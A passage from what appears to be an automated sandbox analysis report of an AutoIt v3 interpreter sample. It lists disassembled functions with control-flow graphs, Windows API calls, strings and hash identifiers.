7ff74d0775bc 457->464 465 7ff74d0775ef-7ff74d0775f9 call 7ff74d0704b8 457->465 466 7ff74d0775fe-7ff74d077643 458->466 467 7ff74d0775ec 458->467 464->458 465->446 469 7ff74d077665-7ff74d077671 466->469 470 7ff74d077645-7ff74d077649 466->470 467->465 473 7ff74d077677-7ff74d07767b 469->473 474 7ff74d077718 469->474 470->469 472 7ff74d07764b-7ff74d077660 470->472 472->469 473->474 475 7ff74d077681-7ff74d0776c9 CloseHandle CreateFileW 473->475 474->446 476 7ff74d0776fe-7ff74d077713 475->476 477 7ff74d0776cb-7ff74d0776f9 GetLastError call 7ff74d065564 call 7ff74d06e548 475->477 476->474 477->476
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                          • String ID:
                                                                                          • API String ID: 1617910340-0
                                                                                          • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                          • Instruction ID: 139bcaae08489b3036bb6e3e74736404e93b05d0910dc86e6109c40d0c7f4c9b
                                                                                          • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                          • Instruction Fuzzy Hash: 48C1BC32B1CA45CAEB10EB64D4553BC7761AB89BA8F401235DEAE5B7A5EF38D015C320
                                                                                          Function 00007FF74D0425BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 557 7ff74d0425bc-7ff74d04263d 561 7ff74d04287e-7ff74d0428af 557->561 562 7ff74d042643-7ff74d04267c 557->562 563 7ff74d042680-7ff74d042687 562->563 565 7ff74d04268d-7ff74d0426a1 563->565 566 7ff74d042856-7ff74d042876 563->566 568 7ff74d0426a7-7ff74d0426bc 565->568 569 7ff74d08d148-7ff74d08d14f 565->569 566->561 570 7ff74d0429c8-7ff74d0429eb PeekMessageW 568->570 571 7ff74d0426c2-7ff74d0426c9 568->571 572 7ff74d08d155 569->572 573 7ff74d042702-7ff74d042723 569->573 574 7ff74d0426e8-7ff74d0426ef 570->574 575 7ff74d0429f1-7ff74d0429f5 570->575 571->570 576 7ff74d0426cf-7ff74d0426d4 571->576 583 7ff74d08d15a-7ff74d08d160 572->583 589 7ff74d04276e-7ff74d0427d2 573->589 590 7ff74d042725-7ff74d04272c 573->590 581 7ff74d08e285-7ff74d08e293 574->581 582 7ff74d0426f5-7ff74d0426fc 574->582 578 7ff74d0429fb-7ff74d042a05 575->578 579 7ff74d08d1aa-7ff74d08d1bb 575->579 576->570 580 7ff74d0426da-7ff74d0426e2 GetInputState 576->580 578->583 585 7ff74d042a0b-7ff74d042a1d call 7ff74d052de8 578->585 579->574 580->570 580->574 586 7ff74d08e29d-7ff74d08e2b5 call 7ff74d04f1c4 581->586 582->573 582->586 587 7ff74d08d162-7ff74d08d176 583->587 588 7ff74d08d19b 583->588 604 7ff74d042a1f-7ff74d042a2d TranslateMessage DispatchMessageW 585->604 605 7ff74d042a33-7ff74d042a4f PeekMessageW 585->605 586->566 587->588 591 7ff74d08d178-7ff74d08d17f 587->591 588->579 626 7ff74d0427d8-7ff74d0427da 589->626 627 7ff74d08e276 589->627 590->589 592 7ff74d04272e-7ff74d042738 590->592 591->588 596 7ff74d08d181-7ff74d08d190 TranslateAcceleratorW 591->596 597 7ff74d04273f-7ff74d042742 592->597 596->585 601 7ff74d08d196 596->601 602 7ff74d042748 597->602 603 7ff74d0428b0-7ff74d0428b7 597->603 601->605 607 7ff74d04274f-7ff74d042752 602->607 608 7ff74d0428b9-7ff74d0428cc timeGetTime 603->608 609 7ff74d0428eb-7ff74d0428ef 603->609 604->605 605->574 610 7ff74d042a55 605->610 612 7ff74d042758-7ff74d042761 607->612 613 7ff74d0428f4-7ff74d0428fb 607->613 614 7ff74d0428d2-7ff74d0428d7 608->614 615 7ff74d08d2ab-7ff74d08d2b0 608->615 609->597 610->575 617 7ff74d042767 612->617 618 7ff74d08d4c7-7ff74d08d4ce 612->618 622 7ff74d08d2f8-7ff74d08d303 613->622 623 7ff74d042901-7ff74d042905 613->623 619 7ff74d0428d9 614->619 620 7ff74d0428dc-7ff74d0428e5 614->620 615->620 621 7ff74d08d2b6 615->621 617->589 619->620 620->609 625 7ff74d08d2bb-7ff74d08d2f3 timeGetTime call 7ff74d052ac0 call 7ff74d0b3a28 620->625 621->625 628 7ff74d08d305 622->628 629 7ff74d08d309-7ff74d08d30c 622->629 623->607 625->609 626->627 633 7ff74d0427e0-7ff74d0427ee 626->633 627->581 628->629 630 7ff74d08d312-7ff74d08d319 629->630 631 7ff74d08d30e 629->631 634 7ff74d08d322-7ff74d08d329 630->634 635 7ff74d08d31b 630->635 631->630 633->627 637 7ff74d0427f4-7ff74d042819 633->637 640 7ff74d08d332-7ff74d08d33d call 7ff74d0542a0 634->640 641 7ff74d08d32b 634->641 635->634 638 7ff74d04290a-7ff74d04290d 637->638 639 7ff74d04281f-7ff74d042829 call 7ff74d042b70 637->639 645 7ff74d042931-7ff74d042933 638->645 646 7ff74d04290f-7ff74d04291a call 7ff74d042e30 638->646 650 7ff74d04282e-7ff74d042836 639->650 640->602 640->618 641->640 648 7ff74d042971-7ff74d042974 645->648 649 7ff74d042935-7ff74d042949 call 7ff74d0466c0 645->649 646->650 656 7ff74d04297a-7ff74d042997 call 7ff74d0401a0 648->656 657 7ff74d08dfbe-7ff74d08dfc0 648->657 659 7ff74d04294e-7ff74d042950 649->659 654 7ff74d04299e-7ff74d0429ab 650->654 655 7ff74d04283c 650->655 662 7ff74d08e181-7ff74d08e197 call 7ff74d054c24 * 2 654->662 663 7ff74d0429b1-7ff74d0429be call 7ff74d054c24 654->663 660 7ff74d042840-7ff74d042843 655->660 671 7ff74d04299c 656->671 664 7ff74d08dfc2-7ff74d08dfc5 657->664 665 7ff74d08dfed-7ff74d08dff6 657->665 659->650 668 7ff74d042956-7ff74d042966 659->668 669 7ff74d042849-7ff74d042850 660->669 670 7ff74d042b17-7ff74d042b1d 660->670 662->627 663->570 664->660 674 7ff74d08dfcb-7ff74d08dfe7 call 7ff74d043c20 664->674 666 7ff74d08e005-7ff74d08e00c 665->666 667 7ff74d08dff8-7ff74d08e003 665->667 675 7ff74d08e00f-7ff74d08e016 call 7ff74d0c8b98 666->675 667->675 668->650 676 7ff74d04296c 668->676 669->563 669->566 670->669 677 7ff74d042b23-7ff74d042b2d 670->677 671->659 674->665 688 7ff74d08e0d7-7ff74d08e0d9 675->688 689 7ff74d08e01c-7ff74d08e036 call 7ff74d0b34e4 675->689 682 7ff74d08e0f4-7ff74d08e10e call 7ff74d0b34e4 676->682 677->569 694 7ff74d08e110-7ff74d08e11d 682->694 695 7ff74d08e147-7ff74d08e14e 682->695 691 7ff74d08e0df-7ff74d08e0ee call 7ff74d0ca320 688->691 692 7ff74d08e0db 688->692 705 7ff74d08e06f-7ff74d08e076 689->705 706 7ff74d08e038-7ff74d08e045 689->706 691->682 692->691 699 7ff74d08e11f-7ff74d08e130 call 7ff74d054c24 * 2 694->699 700 7ff74d08e135-7ff74d08e142 call 7ff74d054c24 694->700 695->669 696 7ff74d08e154-7ff74d08e15a 695->696 696->669 703 7ff74d08e160-7ff74d08e169 696->703 699->700 700->695 703->662 705->669 708 7ff74d08e07c-7ff74d08e082 705->708 710 7ff74d08e047-7ff74d08e058 call 7ff74d054c24 * 2 706->710 711 7ff74d08e05d-7ff74d08e06a call 7ff74d054c24 706->711 708->669 713 7ff74d08e088-7ff74d08e091 708->713 710->711 711->705 713->688
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                          • String ID:
                                                                                          • API String ID: 3249950245-0
                                                                                          • Opcode ID: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                                                          • Instruction ID: 1604de5c1701d756a31aef4b9a02616ad1d09062d314a52c95d023c6a19cfeb9
                                                                                          • Opcode Fuzzy Hash: b0d5c899f7f315bbab548dcb41821af8f2ed58059bb4773332668f9261cfd511
                                                                                          • Instruction Fuzzy Hash: 49229F32A0D682CAEB64FB20E4587BDA7A0FB45B44F944135DACE436A5EF7DE441C720
                                                                                          Function 00007FF74D033CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 849 7ff74d033cbc-7ff74d033d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$Show
                                                                                          • String ID: AutoIt v3$d$edit
                                                                                          • API String ID: 2813641753-2600919596
                                                                                          • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                          • Instruction ID: dff20a05479151fe4da1a71b069115507f27bca8bc82d5d4bcec0760561266ea
                                                                                          • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                          • Instruction Fuzzy Hash: F7218C72A2CB42C6E714EB10F448329B3A0F788799F914239DACD47A64EFBED145CB10
                                                                                          Function 00007FF74D037EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052D8E
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052D9C
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DAC
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DBC
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DCA
                                                                                            • Part of subcall function 00007FF74D052D5C: MapVirtualKeyW.USER32(?,?,?,00007FF74D037FA5), ref: 00007FF74D052DD8
                                                                                            • Part of subcall function 00007FF74D04EEC8: RegisterWindowMessageW.USER32 ref: 00007FF74D04EF76
                                                                                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D03106D), ref: 00007FF74D038209
                                                                                          • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D03106D), ref: 00007FF74D03828F
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF74D03106D), ref: 00007FF74D07D36A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                          • String ID: AutoIt
                                                                                          • API String ID: 1986988660-2515660138
                                                                                          • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                          • Instruction ID: 839ed2cf2b8359aebd23852232965271c200203c28a21abf63a75a1510a0c7be
                                                                                          • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                          • Instruction Fuzzy Hash: D3C19061E1DB47C5E640FB14B981065B7A4BF98350F92033AD8CD62AB1FF7EA151CBA0
                                                                                          Function 00007FF74D0372C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                          • String ID: Line:
                                                                                          • API String ID: 3135491444-1585850449
                                                                                          • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                          • Instruction ID: 9d7fd71b9bec714c8143c0d9c3c262710b176b10df6dcaca4330ac832b3faf21
                                                                                          • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                          • Instruction Fuzzy Hash: A9411062A0C686D7EB20FB14E5402F9A361FB85344FD45135DACC076AAFEBDE644CB60
                                                                                          Function 00007FF74D033F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00007FF74D07BAA2
                                                                                            • Part of subcall function 00007FF74D0356D4: GetFullPathNameW.KERNEL32(?,00007FF74D0356C1,?,00007FF74D037A0C,?,?,?,00007FF74D03109E), ref: 00007FF74D0356FF
                                                                                            • Part of subcall function 00007FF74D033EB4: GetLongPathNameW.KERNELBASE ref: 00007FF74D033ED8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                          • API String ID: 779396738-2360590182
                                                                                          • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                          • Instruction ID: f8f777eabdd012499428785b501a8f02220ff664a1fdce2e4e4c2456296caa3a
                                                                                          • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                          • Instruction Fuzzy Hash: 4B316E6260CB82C9E710FB21E9441A9B7A4FB49B84F944135DE8C47B65EF7CD545CB10
                                                                                          Function 00007FF74D054610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                          • String ID:
                                                                                          • API String ID: 3812282468-0
                                                                                          • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                          • Instruction ID: eac422e719909b8914bc1d1c17f7fa64633b0e3dbfbd0ed70b573cc52ee31fb1
                                                                                          • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                          • Instruction Fuzzy Hash: AD31C122A0CB82C7EB61BB1190543BDB799E745F84F984075DE8C07769EE2CD644C760
                                                                                          Function 00007FF74D036F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF74D036F52,?,?,?,?,?,?,00007FF74D03782C), ref: 00007FF74D036FA5
                                                                                          • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF74D036F52,?,?,?,?,?,?,00007FF74D03782C), ref: 00007FF74D036FD3
                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF74D036F52,?,?,?,?,?,?,00007FF74D03782C), ref: 00007FF74D036FFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3677997916-0
                                                                                          • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                          • Instruction ID: bcd5162dba5fe5ffd07a9128991c96b7d92d8c0b93bfc8755e3e33633ed6c9e3
                                                                                          • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                          • Instruction Fuzzy Hash: 1D217C32A1C741C7D710AF15E648A6EB3A4FB88B84B841535EB8D83B24EF39E4148B10
                                                                                          Function 00007FF74D059118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                          • Instruction ID: 7e354a1b15e0a89f8b6b48916c63e1cfb2e316628e5f4031ea8027e44ada1eed
                                                                                          • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                          • Instruction Fuzzy Hash: 47E01220B0C355C2EF54BB60AD5D37593525F8D741F825438CC8E033B2ED3DE4088220
                                                                                          Function 00007FF74D0466C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Init_thread_footer
                                                                                          • String ID: CALL
                                                                                          • API String ID: 1385522511-4196123274
                                                                                          • Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                                          • Instruction ID: 40ac26302e7a417c252ce872da17ca9c866711531290f0a8c1b8e95ccbd72e8d
                                                                                          • Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                                          • Instruction Fuzzy Hash: 64227832B0CA42CAEB10FF65D0447ACA7A2FB44B88F904536CA8D577A5EF38E455C760
                                                                                          Function 00007FF74D036838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                          • Instruction ID: 1a5e33afc03b564b8609a5ca47a04e391b9f728a478bc88159de02b2b95e681c
                                                                                          • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                          • Instruction Fuzzy Hash: 6E418F3290C642C3E724BF14E514379A7A0EB89768F944331DAED0B6E9EFBDD4048B54
                                                                                          Function 00007FF74D036460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                          • String ID:
                                                                                          • API String ID: 2632591731-0
